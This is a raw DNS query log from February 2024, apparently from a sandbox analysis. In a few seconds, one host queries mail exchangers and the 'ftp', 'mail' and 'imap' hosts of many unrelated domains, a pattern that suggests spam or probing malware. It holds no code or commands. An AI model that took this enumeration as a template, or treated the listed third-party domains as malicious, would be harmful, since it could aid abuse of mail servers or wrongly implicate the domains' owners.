Feb 21, 2024 00:26:04.245359898 CET	192.168.2.6	1.1.1.1	0xcccd	Standard query (0)	cabinet-orsika.fr	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.255619049 CET	192.168.2.6	1.1.1.1	0x962d	Standard query (0)	mx3.mtaroutes.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.256064892 CET	192.168.2.6	1.1.1.1	0x5d61	Standard query (0)	spool.mail.gandi.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.256724119 CET	192.168.2.6	1.1.1.1	0xb245	Standard query (0)	mx01.ionos.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.256917953 CET	192.168.2.6	1.1.1.1	0x84d6	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.257159948 CET	192.168.2.6	1.1.1.1	0x902d	Standard query (0)	ASPMX.L.GOOGLE.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.260577917 CET	192.168.2.6	1.1.1.1	0xb8ef	Standard query (0)	cdgcapitalbourse-ma.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.261323929 CET	192.168.2.6	1.1.1.1	0x3385	Standard query (0)	aspmx2.googlemail.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.261820078 CET	192.168.2.6	1.1.1.1	0x8c2c	Standard query (0)	mail.b4l-clan.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.262383938 CET	192.168.2.6	1.1.1.1	0x8b37	Standard query (0)	mail.att.com.tw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.263330936 CET	192.168.2.6	1.1.1.1	0x8545	Standard query (0)	mx1.cleanmx.pt	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.264569998 CET	192.168.2.6	1.1.1.1	0xf26b	Standard query (0)	angusma.vps360.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.265624046 CET	192.168.2.6	1.1.1.1	0x9c	Standard query (0)	mx01.mail-redirect.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.269390106 CET	192.168.2.6	1.1.1.1	0x7759	Standard query (0)	waukeshawater-com02b.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.269742966 CET	192.168.2.6	1.1.1.1	0xff9	Standard query (0)	mxb.ovh.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.270081043 CET	192.168.2.6	1.1.1.1	0x314e	Standard query (0)	voltagedistribution-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.270687103 CET	192.168.2.6	1.1.1.1	0xad6d	Standard query (0)	mx1.forwardemail.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271003008 CET	192.168.2.6	1.1.1.1	0x1c1c	Standard query (0)	alt4.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.271291971 CET	192.168.2.6	1.1.1.1	0x5787	Standard query (0)	park-mx.above.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.272672892 CET	192.168.2.6	1.1.1.1	0x7799	Standard query (0)	a.mx.nildram.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.272916079 CET	192.168.2.6	1.1.1.1	0x8e42	Standard query (0)	mx.generic-isp.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.299066067 CET	192.168.2.6	1.1.1.1	0xa39a	Standard query (0)	cfgteam.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.598258018 CET	192.168.2.6	1.1.1.1	0xca5d	Standard query (0)	alt2.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.598258018 CET	192.168.2.6	1.1.1.1	0x2a9	Standard query (0)	mx.mail-data.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.598258018 CET	192.168.2.6	1.1.1.1	0x1e8f	Standard query (0)	architettosangiorgio-ch.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.599514008 CET	192.168.2.6	1.1.1.1	0x845a	Standard query (0)	mx01.ionos.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.600271940 CET	192.168.2.6	1.1.1.1	0xd21a	Standard query (0)	mail.breecetechnology.co.za	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.602190018 CET	192.168.2.6	1.1.1.1	0xa865	Standard query (0)	mx.netregistry.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.602190018 CET	192.168.2.6	1.1.1.1	0xf829	Standard query (0)	mail.shinko-kensetsu.co.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.602561951 CET	192.168.2.6	1.1.1.1	0x785a	Standard query (0)	pharmacievp-fr02c.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:05.613073111 CET	192.168.2.6	1.1.1.1	0x55b8	Standard query (0)	houseguru.com.au	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:05.613424063 CET	192.168.2.6	1.1.1.1	0x6a4a	Standard query (0)	att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:05.613440037 CET	192.168.2.6	1.1.1.1	0xd21a	Standard query (0)	mail.breecetechnology.co.za	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:06.993454933 CET	192.168.2.6	1.1.1.1	0x6892	Standard query (0)	blauthlaw-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:06.996309996 CET	192.168.2.6	1.1.1.1	0x68db	Standard query (0)	gmcocorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.428486109 CET	192.168.2.6	1.1.1.1	0x69d	Standard query (0)	mx01.hrs-ds.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.736366034 CET	192.168.2.6	1.1.1.1	0xcbbd	Standard query (0)	gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.736978054 CET	192.168.2.6	1.1.1.1	0x8db5	Standard query (0)	undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.737195969 CET	192.168.2.6	1.1.1.1	0x8762	Standard query (0)	generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.737426996 CET	192.168.2.6	1.1.1.1	0xa1b4	Standard query (0)	hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.737729073 CET	192.168.2.6	1.1.1.1	0x6b4b	Standard query (0)	heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.737986088 CET	192.168.2.6	1.1.1.1	0x2a02	Standard query (0)	hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.738228083 CET	192.168.2.6	1.1.1.1	0x3d60	Standard query (0)	radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.738455057 CET	192.168.2.6	1.1.1.1	0x2e99	Standard query (0)	igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.738886118 CET	192.168.2.6	1.1.1.1	0x49f8	Standard query (0)	hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.739098072 CET	192.168.2.6	1.1.1.1	0x1aa8	Standard query (0)	ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.739401102 CET	192.168.2.6	1.1.1.1	0xf23f	Standard query (0)	jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.785857916 CET	192.168.2.6	1.1.1.1	0xdc0	Standard query (0)	dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.788629055 CET	192.168.2.6	1.1.1.1	0x9485	Standard query (0)	att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.799618959 CET	192.168.2.6	1.1.1.1	0xa52c	Standard query (0)	www.glazing-bt.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.894675970 CET	192.168.2.6	1.1.1.1	0x469d	Standard query (0)	www.caspianseagulltravels.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.898794889 CET	192.168.2.6	1.1.1.1	0xc79e	Standard query (0)	www.stylesense.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:07.909065008 CET	192.168.2.6	1.1.1.1	0x7a8e	Standard query (0)	sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.020205021 CET	192.168.2.6	1.1.1.1	0xa52a	Standard query (0)	mx3-hosting.jellyfish.systems	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.028146029 CET	192.168.2.6	1.1.1.1	0xea6b	Standard query (0)	alt3.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.028445005 CET	192.168.2.6	1.1.1.1	0x7498	Standard query (0)	eskimo1.cleanmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.028727055 CET	192.168.2.6	1.1.1.1	0x4894	Standard query (0)	mx1.pub.mailpod8-cph3.one.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.137254953 CET	192.168.2.6	1.1.1.1	0x96ae	Standard query (0)	www.domainmarkt.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.138140917 CET	192.168.2.6	1.1.1.1	0x77fa	Standard query (0)	morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.418638945 CET	192.168.2.6	1.1.1.1	0x7d83	Standard query (0)	lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.419053078 CET	192.168.2.6	1.1.1.1	0xa8f0	Standard query (0)	imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.446223974 CET	192.168.2.6	1.1.1.1	0x799d	Standard query (0)	www.eyegage.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.446223974 CET	192.168.2.6	1.1.1.1	0x5342	Standard query (0)	www.montessorihawaii.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.446799040 CET	192.168.2.6	1.1.1.1	0x5db2	Standard query (0)	smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.447827101 CET	192.168.2.6	1.1.1.1	0x8cbb	Standard query (0)	www.markoren.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.447827101 CET	192.168.2.6	1.1.1.1	0xbdb6	Standard query (0)	x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.488970995 CET	192.168.2.6	1.1.1.1	0xd626	Standard query (0)	hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.500881910 CET	192.168.2.6	1.1.1.1	0x2aa9	Standard query (0)	terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.500881910 CET	192.168.2.6	1.1.1.1	0x3a42	Standard query (0)	zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.501082897 CET	192.168.2.6	1.1.1.1	0xef8a	Standard query (0)	architettosangiorgio.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.502382994 CET	192.168.2.6	1.1.1.1	0x420d	Standard query (0)	jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.502382994 CET	192.168.2.6	1.1.1.1	0xd458	Standard query (0)	newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.530459881 CET	192.168.2.6	1.1.1.1	0x54b6	Standard query (0)	aregods.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.536315918 CET	192.168.2.6	1.1.1.1	0x280c	Standard query (0)	hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.536516905 CET	192.168.2.6	1.1.1.1	0x1f82	Standard query (0)	tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.536911011 CET	192.168.2.6	1.1.1.1	0x9f1f	Standard query (0)	farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.536911011 CET	192.168.2.6	1.1.1.1	0x19f1	Standard query (0)	hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.545228958 CET	192.168.2.6	1.1.1.1	0x5d35	Standard query (0)	protonmail.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.545229912 CET	192.168.2.6	1.1.1.1	0x5e04	Standard query (0)	hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.545396090 CET	192.168.2.6	1.1.1.1	0x9fb7	Standard query (0)	oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.546443939 CET	192.168.2.6	1.1.1.1	0xe812	Standard query (0)	cfgteam-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.578104973 CET	192.168.2.6	1.1.1.1	0xbd4d	Standard query (0)	rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.579348087 CET	192.168.2.6	1.1.1.1	0x8fc6	Standard query (0)	spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.579684973 CET	192.168.2.6	1.1.1.1	0xd4ef	Standard query (0)	scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.579925060 CET	192.168.2.6	1.1.1.1	0x3aca	Standard query (0)	utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.581212044 CET	192.168.2.6	1.1.1.1	0x831c	Standard query (0)	esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.581212044 CET	192.168.2.6	1.1.1.1	0x1345	Standard query (0)	homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.581537962 CET	192.168.2.6	1.1.1.1	0x4728	Standard query (0)	kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.661705971 CET	192.168.2.6	1.1.1.1	0xdd89	Standard query (0)	temxp.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.662211895 CET	192.168.2.6	1.1.1.1	0x8180	Standard query (0)	hoenighotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.663480997 CET	192.168.2.6	1.1.1.1	0x60a6	Standard query (0)	ww2.affinity.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.695756912 CET	192.168.2.6	1.1.1.1	0x92dc	Standard query (0)	schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.747957945 CET	192.168.2.6	1.1.1.1	0xdb5d	Standard query (0)	fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.811085939 CET	192.168.2.6	1.1.1.1	0x93e1	Standard query (0)	att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.827662945 CET	192.168.2.6	1.1.1.1	0x93aa	Standard query (0)	29hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:08.874701023 CET	192.168.2.6	1.1.1.1	0x6500	Standard query (0)	hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.040448904 CET	192.168.2.6	1.1.1.1	0x9c3d	Standard query (0)	ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.131689072 CET	192.168.2.6	1.1.1.1	0x53bc	Standard query (0)	outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.132469893 CET	192.168.2.6	1.1.1.1	0x9f18	Standard query (0)	gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.139710903 CET	192.168.2.6	1.1.1.1	0x8366	Standard query (0)	runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.157785892 CET	192.168.2.6	1.1.1.1	0xdbd4	Standard query (0)	cdgcapitalbourse.ma	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.222886086 CET	192.168.2.6	1.1.1.1	0x387a	Standard query (0)	www.mwpmedia.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.222886086 CET	192.168.2.6	1.1.1.1	0x7d83	Standard query (0)	www.corp.att.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.266048908 CET	192.168.2.6	1.1.1.1	0x22fd	Standard query (0)	www.gmcocorp.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.267205000 CET	192.168.2.6	1.1.1.1	0x52a2	Standard query (0)	iisalessandrini.edu.it	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.313458920 CET	192.168.2.6	1.1.1.1	0xadc	Standard query (0)	relay.hoenighotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.314455986 CET	192.168.2.6	1.1.1.1	0xa2e8	Standard query (0)	imap.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.359004021 CET	192.168.2.6	1.1.1.1	0xeea0	Standard query (0)	ssh.creativ-moebelwerkstaetten.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.379595995 CET	192.168.2.6	1.1.1.1	0xa3b0	Standard query (0)	mx00.ionos.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.407216072 CET	192.168.2.6	1.1.1.1	0x8b5e	Standard query (0)	mailgate.m-viper.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.551901102 CET	192.168.2.6	1.1.1.1	0xa6e2	Standard query (0)	www.cabinet-orsika.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.570981026 CET	192.168.2.6	1.1.1.1	0x1eae	Standard query (0)	www.netzschnipsel.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.578659058 CET	192.168.2.6	1.1.1.1	0x1e0e	Standard query (0)	ftp.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.579214096 CET	192.168.2.6	1.1.1.1	0xabcd	Standard query (0)	ftp.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.590126038 CET	192.168.2.6	1.1.1.1	0x37a3	Standard query (0)	imp.ovh.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.602102041 CET	192.168.2.6	1.1.1.1	0x7b89	Standard query (0)	ftp.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.602654934 CET	192.168.2.6	1.1.1.1	0x1944	Standard query (0)	ftp.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.609422922 CET	192.168.2.6	1.1.1.1	0x42c	Standard query (0)	ftp.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.609591007 CET	192.168.2.6	1.1.1.1	0x8636	Standard query (0)	ftp.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.610119104 CET	192.168.2.6	1.1.1.1	0x1c4b	Standard query (0)	mail.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.611618042 CET	192.168.2.6	1.1.1.1	0xba51	Standard query (0)	ftp.aregods.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.613262892 CET	192.168.2.6	1.1.1.1	0xac88	Standard query (0)	ftp.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.617738008 CET	192.168.2.6	1.1.1.1	0x9825	Standard query (0)	ftp.sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.668884993 CET	192.168.2.6	1.1.1.1	0x9ad4	Standard query (0)	mail.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.671053886 CET	192.168.2.6	1.1.1.1	0x8770	Standard query (0)	ftp.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.758922100 CET	192.168.2.6	1.1.1.1	0xdc8f	Standard query (0)	ftp.architettosangiorgio.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.760629892 CET	192.168.2.6	1.1.1.1	0x8d04	Standard query (0)	ftp.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.760812998 CET	192.168.2.6	1.1.1.1	0x67bf	Standard query (0)	mail.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.761919975 CET	192.168.2.6	1.1.1.1	0xfcb	Standard query (0)	ftp.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.762288094 CET	192.168.2.6	1.1.1.1	0xe509	Standard query (0)	mail.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.763600111 CET	192.168.2.6	1.1.1.1	0x212e	Standard query (0)	ftp.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.763762951 CET	192.168.2.6	1.1.1.1	0x4136	Standard query (0)	ftp.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.772284985 CET	192.168.2.6	1.1.1.1	0x6813	Standard query (0)	ftp.29hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.778729916 CET	192.168.2.6	1.1.1.1	0x2a9a	Standard query (0)	ftp.temxp.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.819503069 CET	192.168.2.6	1.1.1.1	0x84fe	Standard query (0)	mail.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.880328894 CET	192.168.2.6	1.1.1.1	0xeb2e	Standard query (0)	www.schussundtor.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.881361008 CET	192.168.2.6	1.1.1.1	0x1e9f	Standard query (0)	ftp.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.882900000 CET	192.168.2.6	1.1.1.1	0x1db0	Standard query (0)	ftp.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.884330988 CET	192.168.2.6	1.1.1.1	0x689e	Standard query (0)	ftp.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.885713100 CET	192.168.2.6	1.1.1.1	0x46d0	Standard query (0)	ftp.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.887067080 CET	192.168.2.6	1.1.1.1	0x3426	Standard query (0)	ftp.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.887931108 CET	192.168.2.6	1.1.1.1	0x4124	Standard query (0)	mail.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.888154030 CET	192.168.2.6	1.1.1.1	0xa352	Standard query (0)	mail.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.891217947 CET	192.168.2.6	1.1.1.1	0xaf2b	Standard query (0)	ftp.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.893698931 CET	192.168.2.6	1.1.1.1	0x1284	Standard query (0)	mail.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.901906013 CET	192.168.2.6	1.1.1.1	0x47c4	Standard query (0)	ftp.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.902903080 CET	192.168.2.6	1.1.1.1	0x8275	Standard query (0)	ftp.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.905666113 CET	192.168.2.6	1.1.1.1	0xb418	Standard query (0)	ftp.hoenighotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.905958891 CET	192.168.2.6	1.1.1.1	0x2137	Standard query (0)	proton.me	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.908246040 CET	192.168.2.6	1.1.1.1	0xaa1	Standard query (0)	ftp.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.909187078 CET	192.168.2.6	1.1.1.1	0xcf97	Standard query (0)	ftp.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.909651041 CET	192.168.2.6	1.1.1.1	0x617	Standard query (0)	ftp.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.910151005 CET	192.168.2.6	1.1.1.1	0x8350	Standard query (0)	ftp.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.911051035 CET	192.168.2.6	1.1.1.1	0x876c	Standard query (0)	ftp.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.911818027 CET	192.168.2.6	1.1.1.1	0x50cf	Standard query (0)	ftp.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:09.912367105 CET	192.168.2.6	1.1.1.1	0xc708	Standard query (0)	mail.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.038904905 CET	192.168.2.6	1.1.1.1	0xc430	Standard query (0)	mail.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.046452045 CET	192.168.2.6	1.1.1.1	0x625d	Standard query (0)	mail.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.052814960 CET	192.168.2.6	1.1.1.1	0xbb67	Standard query (0)	ftp.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.053961992 CET	192.168.2.6	1.1.1.1	0x1579	Standard query (0)	ftp.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.054344893 CET	192.168.2.6	1.1.1.1	0xea09	Standard query (0)	ftp.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.055130005 CET	192.168.2.6	1.1.1.1	0xd851	Standard query (0)	ftp.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.058816910 CET	192.168.2.6	1.1.1.1	0x3d92	Standard query (0)	ftp.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.059170008 CET	192.168.2.6	1.1.1.1	0xf435	Standard query (0)	www.shinko-kensetsu.eei.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.061856985 CET	192.168.2.6	1.1.1.1	0x6079	Standard query (0)	ftp.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.062124014 CET	192.168.2.6	1.1.1.1	0x59fa	Standard query (0)	mail.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.066150904 CET	192.168.2.6	1.1.1.1	0x47a1	Standard query (0)	ftp.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.069458961 CET	192.168.2.6	1.1.1.1	0xb223	Standard query (0)	ftp.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.074225903 CET	192.168.2.6	1.1.1.1	0x7f25	Standard query (0)	mail.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.074798107 CET	192.168.2.6	1.1.1.1	0x2fc7	Standard query (0)	mail.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.075265884 CET	192.168.2.6	1.1.1.1	0x567a	Standard query (0)	ftp.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.095453024 CET	192.168.2.6	1.1.1.1	0xd314	Standard query (0)	ftp.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.102118969 CET	192.168.2.6	1.1.1.1	0x4d69	Standard query (0)	mail.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.164947987 CET	192.168.2.6	1.1.1.1	0x53bc	Standard query (0)	outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.167316914 CET	192.168.2.6	1.1.1.1	0x2e47	Standard query (0)	ftp.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.167524099 CET	192.168.2.6	1.1.1.1	0xfe2e	Standard query (0)	ftp.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.168922901 CET	192.168.2.6	1.1.1.1	0x9dd3	Standard query (0)	ftp.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.170058012 CET	192.168.2.6	1.1.1.1	0xf0b9	Standard query (0)	mail.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.170398951 CET	192.168.2.6	1.1.1.1	0x9c60	Standard query (0)	mail.rubypink.co.uk	A (IP address)	IN (0x0001)	false
